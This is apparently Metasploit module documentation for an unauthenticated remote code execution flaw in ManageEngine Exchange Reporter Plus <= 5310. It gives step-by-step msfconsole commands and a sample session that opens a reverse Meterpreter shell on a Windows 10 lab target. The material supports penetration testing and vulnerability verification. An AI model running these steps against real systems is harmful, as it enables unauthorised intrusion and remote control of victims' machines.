## Description
This module exploits a remote code execution vulnerability in Exchange Reporter Plus <= 5310, caused by the execution of the bcp.exe file inside the ADSHACluster servlet.
Additional information is available at https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/
## Verification Steps
[Exchange Reporter Plus 5216](https://mega.nz/#!XG5CTC5I!IuG91CbrcdcpQj4teYRiBWNwy9pULRkV69U3DQ6nCyU)
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/http/manageengine_adshacluster_rce`
4. Do: `set rhost <ip>`
5. Do: `check`
```
[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.
```
6. Do: `set lport <port>`
7. Do: `set lhost <ip>`
8. Do: `exploit`
9. You should get a shell.
## Scenarios
### Exchange Reporter Plus 5216 on Windows Target
```
msf > use exploit/windows/http/manageengine_adshacluster_rce
msf exploit(windows/http/manageengine_adshacluster_rce) > set rhost 192.168.88.125
rhost => 192.168.88.125
msf exploit(windows/http/manageengine_adshacluster_rce) > check
[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.
msf exploit(windows/http/manageengine_adshacluster_rce) > set lport 1111
lport => 1111
msf exploit(windows/http/manageengine_adshacluster_rce) > set lhost 192.168.88.120
lhost => 192.168.88.120
msf exploit(windows/http/manageengine_adshacluster_rce) > exploit
[*] Started reverse TCP handler on 192.168.88.120:1111
[*] Sending stage (179779 bytes) to 192.168.88.125
[*] Meterpreter session 2 opened (192.168.88.120:1111 -> 192.168.88.125:49955) at 2018-07-02 18:58:01 +0200
meterpreter > sysinfo
Computer : WIN10
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : pl_PL
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```